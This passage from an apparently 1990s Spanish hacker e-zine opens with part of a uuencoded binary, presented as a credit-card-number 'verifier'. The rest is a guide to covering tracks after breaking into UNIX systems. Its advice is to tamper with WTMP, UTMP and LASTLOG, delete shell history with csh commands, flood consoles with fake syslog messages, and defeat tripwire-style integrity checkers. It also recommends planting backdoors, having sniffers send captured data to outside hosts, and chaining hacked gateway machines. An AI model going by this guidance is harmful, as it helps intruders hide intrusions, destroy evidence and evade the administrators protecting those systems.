MBSL$1@9(:.G0_NX.[ACE]PC_W[2AWPI#_RVQZYGJL?[\[N3PW>P(]&_^BW?8
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
="CX8&A<5'Q,4!0\A`%0!$P`(`0#O!-P`UP<``0``
`
end
...............................Corta entre los puntos.........................

 [ Este programa  verifica los numeros de tarjeta que son proporcionados  por
   el usuario. Se ejecuta CARD.EXE y listo. Estos archivos han sido revisados
   con ViruScan95 update de Mayo, PcCillin95 update #228, y F-prot 2.26  8-) ]

..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..
========================================
[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]..[]

 
                        
                         Como cubrir tus Huellas 
                                       
                        

                            PRIMERA PARTE: TEORIA

                              I. Introduccion
                             II. Estado Mental
                            III. Lo Basico
                             IV. Avanzado
                              V. Bajo Sospecha
                             VI. Detenido
                            VII. Programas
                           
     I. Introduccion
     ----------------------------------------------------------------------

 Este texto esta dividido en 2 partes. La primera explica la teoria de borrar
 las huellas en un sistema y las razones de hacerlo. La segunda te muestra
 los pasos a tomar en un sistema UNIX y las cosas que debemos evitar. Si eres
 muy descuidado y flojo para leer todo el articulo (estupido) entonces lee
 la segunda parte.

 Si piensas que conocer los exploits mas nuevos es la cosa mas importante
 para hackear un sistema estas equivocado. Como un exploit te va ayudar
 cuando te demanden y te quiten tus cuentas y computadoras?
 La cosa verdaderamente importante para hackear es no ser sorprendido.

 Es la PRIMERA cosa que un hacker debe dominar, por que en muchas ocasiones,
 especialmente cuando un objetivo esta constantemente vigilado debido a los
 multiples ataques que haya sufrido, tu primer hack puede ser el ultimo o
 si quieres aprender a limpiar tus huellas despues de aprender lo basico
 sobre unix cambiar tus habitos puede resultarte dificil.
     Asi que examina estas secciones con cuidado!
     Hasta un hacker experimentado puede aprender un poco en estos bytes.

  Asi que esto encontraras aqui:
          Seccion I - Me estas leyendo (introduccion).
         Seccion II - Las cosas mentales para convertirte paranoico.
                      1. Motivacion
                      2. Por que debes ser paranoico
                      3. Como convertirte en paranoico
                      4. Permanecer paranoico
        Seccion III - Lo basico ANTES de hackear.
                      1. Prefacio
                      2. Asegurate
                      3. Tu propia cuenta
                      4. Los Registros (LOGS)
                      5. No dejes huella
                      6. Cosas que debes evitar
         Seccion IV - Tecnicas avanzadas
                      1. Prefacio
                      2. Previene que te localizen
                      3. Encuentra y manipula los registros (logs)
                      4. Checa la configuracion syslog y el archivo
                      5. Revisa los programas de seguridad instalados
                      6. Checa los admins
                      7. Como "corregir" el software de verificacion checksum
                      8. Trucos de seguridad
                      9. Miscelanea
          Seccion V - Que hacer si estas bajo sospecha
         Seccion VI - Las cosas que debes y no debes hacer cuando seas
                      sorprendido
        Seccion VII - Programas

    Lean con cuidado y sean todos ustedes impresionados.

     II. Mental
     ----------------------------------------------------------------------

    * Motivacion *
 El aspecto mental es la llave para ser exitoso en todo.

 Es el poder de motivarte a ti mismo, luchar si duele, ser autodisciplinado,
 paranoico y realista, calcular los riesgos correctamente y hacer cosas que
 no te gustan pero son importantes.

 Si no puedes motivarte a ti mismo para programar herramientas importantes
 y esperar el momento perfecto para atacar el objetivo, entonces nunca
 llegaras a ningun lado con tus "hacks".

 Un hacker exitoso debe cumplir con estos requisitos mentales. Es como hacer
 fisiculturismo o una dieta - puedes aprenderlo si realmente intentas.

      HASTA EL MEJOR CONOCIMIENTO NO TE AYUDARA HASTA QUE ESTES REALMENTE
      PREOCUPADO POR TOMAR PREVENCIONES Y DE HECHO HACERLAS.

    * Por que debes ser paranoico *

 Es verdad que ser paranoico normalmente no es algo que hace tu vida mas
 feliz. De cualquier manera si no estas esperando lo peor, cualquier cosa
 puede pasarte y perderas el balance. Y recuerda que hackear es
 arriesgar mucho las cosas.
 En tu vida normal no debes preocuparte mucho de policias, ladrones y cosas
 de ese tipo. Pero si estas del otro lado recuerda que tu haces la vida a
 otras personas dificil, les creas pesadillas y les das trabajo extra - Y
 quieren detenerte.

 Aunque sientas que no cometes un crimen - de hecho lo haces. Las cacerias
 de hackers en Mexico no son populares pero en caso de desatarse alguna todos
 nos veremos involucrados. Ademas recuerden que aqui en Mexico no existe
 aquello de "culpable hasta que se demuestre lo contrario." Me ha tocado
 saber de amigos mios que son sacados de la red simplemente por entablar
 conversaciones por correo electronico respecto a hackear sin hacerles ningun
 tipo de pregunta (vil autoritarismo).

 Una vez que tengas el estigma de un hacker jamas podras quitartelo.
 Una vez que estes en los records criminales es dificil conseguir trabajo.
 Ninguna compaia de software o relacionada con sistemas te contratara,
 tendran miedo de tus aptitudes y te veras a ti mismo forzado a emigrar o tu
 vida estara perdida.

     SE PARANOICO!
     PROTEGETE A TI MISMO!
     RECUERDA QUE TIENES TODO QUE PERDER!
     NUNCA TE SIENTAS TONTO DE HACER ALGO EXTRAORDINARIO PARA EVITAR QUE TE
     LOCALIZEN!
     QUE NUNCA TE IMPORTE QUE OTROS SE RIAN DE TU PARANOIA!
     NUNCA SEAS LO BASTANTE FLOJO O CANSADO PARA MODIFICAR LOS REGISTROS!
     UN HACKER DEBE HACER SU TRABAJO AL 100%!!!

   * Como convertirse en paranoico *

 Si tu lees la parte de arriba y piensas que es verdad, es facil - ya estas
 paranoico. Pero debe convertirse en parte sustancial de tu vida. Si logras
 convertirte en un buen hacker siempre piensa en a quien decir algo, y ten
 presente que tus llamadas y correos electronicos pueden ser monitoreados.
 Lee y memoriza la seccion pasada.

 Si lo anterior no te ha ayudado, entonces piensa en lo que te pasaria si
 te encontraran culpable de "invasion a propiedad privada" y todas esas
 porquerias legales. Estara tu novia contigo? Quieres ver a tus padres
 llorar? Quieres verte expulsado de la escuela/universidad/trabajo?

 No le des NINGUNA oportunidad a esto de que pase!

  Si todo esto no te motiva para protegerte:
  DEJA YA DE HACKEAR!
  Eres un peligro a toda la sociedad de hackers y para tus amigos !

   * Permanece Paranoico *

 Espero hayas entendido la razon para ser paranoico. Asi que permanece
 paranoico. Un error o un momento de pereza puede ser suficiente para arruinar
 tu vida o carrera.

   Siempre recuerda la motivacion para hacerlo.


     III. LO BASICO
     ----------------------------------------------------------------------

   * Prefacio *

 Tu debes saber esto y practicarlo antes de empezar con tu primer hack.
 Existen los absolutamente basicos y sin saberlos estaras en problemas pronto.

   * ASEGURATE *

     Que tal si un administrador lee tu correo?
     Que tal si tus llamadas son grabadas por la policia?
     Que pasaria si la policia te quita tu computadora con toda la
     informacion sobre tus hackings en ella?

 Si no recibes correo sospechoso, no hablas de hack/phreak por el telefono y
 no tienes archivos sensitivos en tu disco entonces no tienes de que
 preocuparte. Pero eres un hacker.
 Cualquier hacker necesita estar en contacto con otros y guardar sus datos en
 algun lugar.

 Encripta la informacion que sea sensitiva!
 Los encriptadores de disco duro son muy importantes y utiles:
    Hay algunos encriptadores muy buenos disponibles en Internet como los
    que mencionare:
      - Si tienes MsDos obten SFS v1.17 o SecureDrive 1.4b
      - Si tienes Amiga obten EnigmaII v.1.5
      - Si usas Unix obten CFS v1.33

  Encriptadores de Archivos: Puedes usar cualquiera, pero debe usar uno de los
  bien conocidos y seguros algoritmos. NUNCA uses un programa de encripcion
  que pueda ser exportado por que la efectividad de la lengitud de sus llaves
  es limitada!
          - Blowfish Advanced 95 (Anti-Tempest, Blowfish32, Idea, Des, etc.)
          - Triple DES
          - IDEA
          - Blowfish (32 rounds)

  Encripta tu correo electronico!
          - PGP v2.6.x es el mas usado asi que usalo tu tambien.
     Encripta tus llamadas telefonicas si quieres discutir cosas importantes.
          -PGPFONE es muy bueno.
          -Nautilus v1.5a es uno de los mejores.
     Encripta tus sesiones de terminal cuando te conectes a un sistema UNIX.
     Alguien puede estar haciendo sniffing, o monitoreando tu linea.
          - SSH es el mas seguro.
          - DES-Login es bastante bueno.

 Usa fuertes passwords que no puedan ser adivinados y que no sean mencionados
 en ningun diccionario. Ellos deben ser al hazar pero facil de recordar para
 ti. Si la llave puede ser mayor de 10 caracteres, usa esa y escoge una
 sentencia de un libro ligeramente modificada.
 Encripta los numeros telefonicos de tus amigos dos veces. Y llamales desde
 telefonos publicos/oficina/etc. solo si no encriptas la llamada.

 El principiante solo necesita PGP, un encriptor de archivos y un encriptor
 de disco duro. Si estas realmente hundido en el hacking como nosotros
 recuerda encriptar TODO.

 Realiza un respaldo de tu informacion (Zip-Drive, otro disco duro, CD, Tape)
 encriptada desde luego y guardala donde no pueda encontrarse relacion con
 equipo de computadoras o contigo. En caso de incendio o que lleguen a tu
 casa a quitarte tus datos no tendras que empesar de cero.

 Manten solo las necesarias notas escritas mientras las necesites. No mas
 tiempo. Guardarlas encriptadas es mucho mas seguro. Quema los papeles cuando
 ya no los necesites. Tu puedes crear notas con un algoritmo de encripcion
 que solo tu conozcas, no le digas a nadie de tu algoritmo y no lo uses para
 textos largos por que puede ser facilmente analizado y quebrado.

 Los verdaderamente ultra-extremadamente-archi-super paranoicos deben
 considerar tambien el proyecto TEMPEST. Policias, espias y hackers pueden
 monitorear todas tus acciones. Una persona bien equipada puede obtener
 *TODO* lo que quiera : La emanacion de pulsos electronicos pueden ser
 obtenidos a mas de 100 metros de distancia y muestran la pantalla de tu
 monitor a cualquier persona, un apuntador laser a traves de tu ventana
 podria escuchar tus conversaciones y un identificador de seales de alta
 frecuencia podria marcar todas las teclas que alguien presiona .... Las
 posibilidades de este ataque son infinitas y aparatos como los jammers
 (interruptores) de seales electronicas estan en el mercado para prevenir
 que seas una victima de un ataque de este tipo.

   * TU PROPIA CUENTA *

 Ahora vamos hablar de tu cuenta propia. Esta es tu cuenta real que obtuviste
 en tu escuela/universidad/trabajo/proveedor y esta asociada con tu nombre.
 Nunca olvides seguir estas reglas cuando uses tu cuenta:

 Nunca hagas algo ilegal o sospechoso con tu cuenta real.
 Ni siquiera hagas Telnet a un host para hackear de tu cuenta.
 Leer las listas de correo sobre seguridad usando tu cuenta esta bien.
 Pero *TODO* lo que *PAREZCA* que tenga que ver con hacking debera estar
 encriptado o borrado.
 Nunca dejes/salves herramientas para hackear en el espacio de tu cuenta.
 Si puedes usa POP3 para conectarte al servidor de correo y obtener+borrar
 tu correo (o realizalo de otra manera si tienes experiencia en UNIX)
 Nunca proporciones tu direccion verdadera de email si tu nombre esta
 en ella o en el espacio de informacion (GECO) de cada usuario.
 Has saber tu verdadera direccion solo a personas que puedas confiar y
 que esten concientes de la seguridad por que si los agarran a ellos
 tu podrias ser el siguiente.
 Si vas a usar tu cuenta para intercambiar informacion asegurate de usar
 PGP ya que los administradores tienden a ser un poco espias (metiches).
 Nunca uses tu cuenta de una manera que muestre que tienes interes en
 hacking. El interes en la seguridad es OK pero nada mas.

   * LOS REGISTROS *

 En la mayoria de los sistemas existen 3 archivos de registro importantes:
          WTMP - Todas las entradas/salidas mas tty y host.
          UTMP - Quien esta en linea en el momento.
          LASTLOG - De donde vinieron los logins.

 Existen otros, pero esos seran discutidos en la seccion avanzada. Todos los
 logins via telnet, ftp, rlogin y en algunos otros sistemas rsh son escritos
 a estos logs. Es MUY importante que te borres de estos archivos si estas
 hackeando por que de otra manera:
          a) pueden ver desde donde hiciste el hacking
          b) desde que host llegaste
          c) sabran cuanto tiempo estuviste en linea y calcularan el impacto

 NUNCA BORRES LOS LOGS! Es la forma mas facil de mostrar a el administrador
 que un hacker estuvo en la maquina. Obten un buen programa para modificarlos.
 ZAP -RareGaZz #3- (o ZAP2) es mencionado como el mejor - pero no lo es. Lo
 unico que hace es sobre escribir la informacion de la ultima persona que
 entro con ceros. CERT ya saco un simple programa que checa por esos ceros
 en los logs asi que esa es una forma facil de revelar la presencia de un
 hacker tambien. De nada sirve hackear R00T si cuando se de cuenta el admin
 todo tu trabajo no servira de nada!
 Otra cosa importante de ZAP es que no funciona si no encuentra los archivos
 con los registros; asi que checa los paths antes de compilar!
 Obten un programa que CAMBIE la informacion (CLOAK2) o uno bueno que BORRE
 la entrada (CLEAR).

 Normalmente uno debe ser r00t para modificar los registros. Pero si no
 lograste hackear el r00t que puedes hacer? No mucho:
 Has un rlogin a la computadora en la que estes, para aadir un nuevo y no
 sospechoso LASTLOG que sera mostrado al administrador cuando entre la
 proxima vez.
 Asi el no se pondra nervioso cuando vea "localhost".
 Muchas distribuciones de UNIX tienen un Bug con el comando Login. Cuando
 lo ejecutas sobre escribe el campo login en UTMP (El que muestra el host
 de donde vienes!) con tu tty.

     Los registros por default estan localizados en estos directorios:

     UTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log
     WTMP : /etc o /var/adm o /usr/adm o /usr/var/adm o /var/log
     LASTLOG :  /usr/var/adm o /usr/adm o /var/adm o /var/log

   * NO DEJES HUELLA *

 Varios hackers se borran de los logs pero se olvidan de borrar otras cosas
 como archivos en /tmp y $HOME

 Shells
 Algunas shells dejan un archivo de registro(dependiendo de la configuracion)
 con todos los comandos que el usuario usa. Eso es muy malo para un hacker.
 La mejor alternativa es empezar un nuevo shell como tu primer comando despues
 de entrar y checar cada vez por un archivo de historia en tu $HOME.
 Archivos de historia de comandos:

       Shell - Archivo
        sh  : .sh_history
        csh : .history   <--- Cincos, Telnor, Microsol, Compunet, orca.etc..
        ksh : .sh_history
        bash: .bash_history
        zsh : .history

     En otras palabras: ejecuta "ls -altr" antes de irte!

     Aqui hay 4 comandos csh que borraran el archivo .history cuando salgas
     del sistema para no dejar huella.

          mv .logout save.1
          echo rm .history>.logout
          echo rm .logout>>.logout
          echo mv save.1 .logout>>.logout


   * COSAS QUE DEBES EVITAR *

 No rompas passwords en otras maquinas que no sea la propia, y desde luego
 hazlo en un disco encriptado. Nota que tambien puedes encriptar una
 particion de tu disco unicamente.
 Si tratas de romper passwords en la universidad por ejemplo y el r00t
 observa el proceso no solo tu cuenta es historia sino tambien el sitio de 
 donde es el archivo con los passwords.
 Obten el passwd (en estos dias el shadow :-) y crackealo en una segunda
 computadora o en un proceso background. Tu no necesitas muchas cuentas de
 un sitio, solo unas pocas.

 Si ejecutas programas importante como ypx, iss, satan o programas para
 explotar sistemas renombralos antes de ejecutarlos. Y desde luego no uses
 parametros en la linea de comandos si el programa soporta modo interactivo
 como telnet.
 Escribe "telnet" y abre "open target.host.com" ... que no mostrara el host
 objetivo en el proceso como parametro.

 Si hackeas algun sistema no pongas una shell suid en ningun lado! Es mejor
 tratar de instalar algunas puertas traseras como ping, quota o login y
 usar fix para corregir el atime y mtime de el archivo si no tienes otra
 posibilidad.


     IV. Tecnicas Avanzadas
     ----------------------------------------------------------------------

   * PREFACIO *

 Una vez que hayas instalado tu primer sniffer y comienzes a hackear por
 el mundo entero entonces debes saber estas tecnicas.

   * PREVIENE QUE TE LOCALICEN *

 En ocasiones tus hacks seran notados. Eso no es ningun problema real si el
 operador del sistema no esta interesado en perseguir los hackers que jueguen
 con su sistema, pero si se deciden a encontrarte entonces empiezan los
 problemas.

 Este corto capitulo te explicara todas las posibilidades que ELLOS tienen
 para encontrarte y que posibilidades tienes tu de prevenir eso.

 * Normalmente *no* sera problema para el administrador identificar a el
 hacker del sistema si:
 1) checan las entradas del registro si el hacker fue peresozo.
 2) si el hacker tiene instalado un sniffer checando el output que este
 produce donde aparecera informacion del hacker.
 3) si usan software de auditoria como loginlog
 4) usando el comando "netstat" cuando el hacker se encuentre en linea.

 Debes esperar que un operador de sistemas se entere de tu procedencia, es
 eso por lo que necesitas un servidor gateway.

 * Un gateway entre los dos - Que es eso?
 Es un servidor como KillerBot los mencionoen el numero 3 de la revista
 "condon" en donde tengas acceso root para alterar los archivos wtmp y
 lastlog.

 * El servidor origen del ataque *
 Desde este servidor haras tu hacking. Telnet (o mejor: remsh/rsh) a una
 maquina gateway y luego al objetivo.
 Necesitas acceso root para cambiar los logs.
 Necesitaras cambiar el servidor desde que hackeas cada 2-4 semanas.

 * Tu acceso Dial-Up a Internet *
 Este es el punto mas critico. Una vez que hayan localizado la maquina
 que usas para accesar a Internet estas frito.
 Tu *NO* necesitas ser r00t en un host que uses para entrar a Internet. Como
 a estos te conectas via modem ahi no existen logs que deban ser modificados.
 Deberas usar una cuenta diferente para entrar a el host cada dia, y tratar
 de usar aquellas que son mas usadas.
 No modifiques el sistema de ninguna manera.
 Necesitas tener por lo menos 2 host para accesar a Internet y cambiarlos cada
 mes o dos.

 # Conclusion: Si tu hackeas otras cosas que universidades entonces necesitas
   hacerlo de esta forma! Aqui esta un esquema para ayudarte ;-)

  +-------+     ~--------------->     +-------------+     +-----------+
  |+-----+|     > Un metodo para>     |Uno de por lo|     |Un servidor|
  || TU  || --> > hacer segura  > --> |menos 3 hosts| --> |desde donde|
  |+-----+|     > la llamada.   >     |de proteccion|     |hackear.   |
  +-------+     ~--------------->     +-------------+     +-----------+
                                                                |
                                                                |
                                                                v
                                           +--------+     +-------------+
                                           |   EL   |     |Un servidor  |
                                           |OBJETIVO| <-- |hackeado como|
                                           |        |     | gateway     |
                                           +--------+     +-------------+

   * 3. Encuentra y manipula los registros *

 Es importante que encuentres todos los archivos de registro - hasta los
 escondidos. Para encontrar todos los tipos de registros existen dos
 faciles posibilidades.

 1) Encuentra todos los archivos abiertos.
    Como todos los archivos de registro deben ser escritos en algun lado,
    obten el programa LSOF - LiSt Open Files - para verlos ... checalos ...
    y si es necesario corrigelos.

 2) Busca todos los archivos modificados despues de que entraste. Despues de
    que entres a un sistema usa el comando "touch /tmp/check" despues trabaja.
    Luego usa el comando "find / -newer /tmp/check -print" y revisa si alguno
    de esos archivos son de auditoria. observa>revisa>corrige.
    Nota que no todos los sistemas y versiones soportan la opcion -newer
    Tu tambien puedes hacer un "find / -ctime 0 -print" o
    "find / -cmin 0 -print" para encontrar los registros.

     Revisa todos los registros que encuentres. Normalmente los registros
     estaran en /usr/adm, /var/adm o /var/log.
     Si cosas se registran a @loghost entonces estas en problemas. Tu
     necesitas hackear la maquina loghost para modificar los logs.

 Para manipular los logs puedes hacer "grep -v", o un conteo de lineas con
 wc, y luego cortar las 10 ultimas con "head -LineNumbersMinus10" o usar
 un editor etc.
 Si los archivos de registro/auditoria no son archivos de texto sino de datos
 identifica el software que escribe los registros. Despues consigue el codigo
 fuente. Despues encuentra el encabezado que defina la estructura del archivo.
 Obten zap, clear, cloak etc. y re-programa los codigos con los encabezados
 del archivo a usar con este tipo especial de archivos de registro (y despues
 pasalo a la comunidad del hacking).

 Si un programa de auditoria esta instalado necesitaras el acct-cleaner de
 zhart, funciona muy bien!

 Un pequeo truco para modificar wtmp es necesario si no puedes compilar
 ningun codigo fuente, perl, etc. Funciona en sistemas Sun pero no en Linux:
 Has uuencode de wtmp. Ejecuta vi, ve al final del archivo y borra las
 ultimas 4 lineas que comienzen con "M" ... despues salvalo y sal., uudecode
 y las ultimas 5 entradas al wtmp estaran borradas ;-)

 Si el sistema usa wtmpx y utmpx entonces estas en problemas ... Hasta ahora
 no conozco ningun programa que pueda modificarlos.

   * 4. Checa la configuracion syslog y el archivo *

 La mayoria de los programas usan syslog para registrar lo que quieren. Es
 importante revisar la configuracion donde syslog imprimira los mensajes.

 El archivo de configuracion es /etc/syslog.conf - la descripcion de cada
 entrada en ese archivo NO seran explicadas en este texto. Lee algun otro
 archivo que trate ese tema en especial ;-). Los tipos de archivos y entradas
 importantes son kern.*, auth.* y authpriv.*

 Fijate donde se escriben esos archivos: los archivos pueden ser modificados.
 Si han sido mandados a otro servidor deberas hackear ese tambien. Si los
 mensajes son enviados a un usuario, tty y/o consola puedes hacer un pequeo
 truco para generar falsos mensajes de registro como ""echo 17:04 12-05-85
 kernel sendmail[243]: can't resolve bla.bla.com > /dev/console" o cualquier
 consola que quieras inundar para que el mensaje que desees esconder
 simplemente se esconda entre los demas.
 Los archivos de registro son *MUY* importantes! Revisalos.

   * Revisa los programas de seguridad instalados *

 En los sitios conscientes de seguridad, existen algunos chequeadores de
 seguridad que son ejecutados por cron. El directorio normal para los
 crontabs son /var/spool/cron/contabs
 Revisa todas las entradas, especialmente las de el archivo "root" y examina
 los archivos que ejecuta. Para una investigacion rapida de los crontabs del
 root escribe "crontab -l root".

 Algunas de estas herramientas de seguridad son instaladas por las cuentas
 administrativas. Algunas de ellas (pequeas utilidades para revisar wtmp,
 y si un sniffer esta instalado) estan en ~/bin.
 Lee abajo para identificar estos admins y revisar sus directorios.

 El software de chequeo interno puede ser tiger, cops, spi, tripwire, l5,
 binaudit, hobgoblin, s3 etc.

 Debes examinar lo que reportan y si ellos reportan algo eso seria un signo
 de alerta de tus hacks.
 Si ese software reporta acciones sospechosas puedes:
     - Actualizar los archivos de datos del programa (modo aprendizaje) para
       que no reporte ese tipo de ataques.
     - Reprogramar/modificar el software para que no reporten las acciones
       sospechosas.

   * 6. Checa los admins *

 Es importante para ti que revises las medidas que los sysops toman si es
 que las toman. - asi que primero necesitas saber las cuentas que normalmente
 utilizan.
 Puedes revisar el archivo .forward de root y revisar la entrada alias del
 root. Tambien revisa el archivo passwd por "admin" para que revele a los
 administradores.

 Ahora debes saber los 1-6 administradores en las maquinas que esten. Cambia
 los directorios (usa chid.c, changeid.c o algun script similar para
 convertirte en ese usuario si el root no tiene derechos a leer cada archivo)
 y revisa sus archivos .history/.sh_history/.bash_history para ver que
 comandos usan. Checa sus archivos .profile/.login/.bash_profile para ver
 que alias tienen en sus chequeos de seguridad. Examina sus directorios
 ~/bin! La mayoria del tiempo los programas de seguridad son puestos en ese
 directorio! Y desde luego echa un vistazo a cada directorio que ellos
 tengan con el comando "ls-alR ~/".

 Si encuentras programas de seguridad, lee 5.) para las posibilidades de
 sobrepasar esas protecciones.

   * 7. Como "corregir" el software de verificacion checksum *

 Algunos administradores le temen a los hackers e instalan software para
 detectar cambios en sus valiosos binarios. Si un binario es modificado,
 la proxima vez que el administrador haga un chequeo sera detectado.

 Asi que como necesitas saber como puedes a)encontrar que chequeadores de
 binarios estan instalados y b) como modificarlos para que puedas plantar un
 caballo de troya?

 Nota que existen muchos chequeadores de archivos binarios y que es muy facil
 escribir alguno - toma 15 minutos - y puede ser realizado con un pequeo
 script. Asi que es dificil encontrar este tipo de software si es que esta
 instalado.
 Estos son algunos de los programas mas usados:

 SOFTWARE : PATH STANDARD : NOMBRE DE LOS ARCHIVOS BINARIOS
     tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire
     binaudit : /usr/local/adm/audit : auditscan
     hobgoblin : ~user/bin : hobgoblin
     raudit : ~user/bin : raudit.pl
     l5 : directorio para compilar : l5

 Como puedes ver hay demasiadas posibilidades! El software o base de datos
 podria estar en un disco no montado en el sistema o en una particion de
 otro host. O la base de datos con los checksums podria estar en un medio
 protegido fisicamente. En el caso de que encuentres un sistema de seguridad
 de este tipo lo mejor es no modificar los archivos binarios.

   * 8. Trucos de seguridad *
 Esto es una cosa rara de hacer y solo es necesario revisar para hacer un buen
 trabajo. Algunos usuarios, llamados administradores y hackers, usualmente no
 quieren que sus cuentas sean usadas por otras personas. Es por eso que ponen
 seguridad en sus archivos de inicio.
 Asi que revisa todos los archivos de puntos (.profile, .cshrc, .login,
 .logout etc.) y que comandos ejecutan, que registros tienen y cual es
 el path de busqueda establecido. Si por ejemplo $HOME/bin viene antes de
 /bin en el path de busqueda deberas revisar los contenidos de ese directorio
 ... quizas exista un programa llamado "ls" o "w" instalado que registra la
 ejecucion antes de ejecutar el verdadero programa.

 Tambien revisa automaticamente los archivos wtmp y lastlog para ver si ha
 sido ejecutado zap, si han sido manipulados los archivos .rhosts y
 .Xauthority, sniffers activos, etc.

 Nunca te metas con cuentas que un 'Mago' de unix este usando!

   * 9. Miscelanea *

 Estas son algunas cosas en las que debes poner atencion.

 Los clientes Telnet viejos exportan la variable USER. Un administrador
 que conozca eso y modifique el telnetd puede obtener todos los nombres de
 usuario e identificar desde que cuenta estas hackeando cuanto se de cuenta
 de tu presencia.
 Los nuevos clientes han sido arreglados - pero el administrador inteligente
 tiene otras formas de localizarte: las variables UID, MAIL y HOME son
 exportadas y hacen la identificacion de la cuenta usada por el hacker
 facilmente. Antes de hacer un Telnet, cambia las variables USER, UID, MAIL y
 HOME, quizas hasta la variable PWD si estas en el directorio Home.

 En los sistemas HP-UX <v10 puedes crear directorios escondidos. No estoy
 hablando acerca de los archivos de punto . o similares sino de un atributo.
 HP introdujo esta opcion en la version 9 pero fue removida en la 10 (debido
 a que era usada solo por hackers ;-). Si haces un "chmod +H directorio" es
 invisible a el comando "ls -al". Para ver los directorios escondidos
 necesitas usar el switch -H ejemplo: "ls -alH"

 Cuando necesites modificar la fecha de un archivo recuerda que usando el
 comando "touch" puedes cambiar el atime y mtime.

 Si instalas un sniffer y es un sistema importante, entonces necesitas
 asegurarte de ofuscar la salida (output) del sniffer (con un algoritmo de
 encripcion o dejar que el sniffer envie toda la informacion capturada por
 via icmp o udp a un host externo bajo tu control). Por que? Si el
 administrador del sistema se entera del sniffer (cpm y otro software
 checando por sniffers) no podran identificar en el archivo de registro que
 informacion fue obtenida, asi que no podra avisar a otros hosts sobre tu
 presencia.



     V. BAJO SOSPECHA
     ----------------------------------------------------------------------

 Una vez que estes bajo sospecha (policia o algun administrador) tu deberas
 tomar acciones especiales para que no tengan evidencia en contra tuya.

 NOTA: Si los administradores de algun sistema piensan que eres un hacker,
       ERES CULPABLE HASTA DEMOSTRAR TU INOCENCIA

 Las leyes no significan nada a los administradores (a veces pienso que la
 diferencia entre un hacker y un administrador es que solo la computadora
 pertenece a ellos). Cuando ellos piensen que eres un hackers, eres culpable
 si no tienes un abogado que hable por ti. Ellos tendran que monitorear tu
 e-mail, archivos y si son lo suficientemente buenos, las teclas que presiones
 tambien.

 Cuando la policia esta involucrada, tu linea telefonica puede ser monitoreada
 tambien y una emboscada puede venir pronto.

 Si te das cuenta o temes que estes bajo sospecha entonces manten un perfil
 bajo! No accion ofensiva debe ser tomada que apunte al hacking.

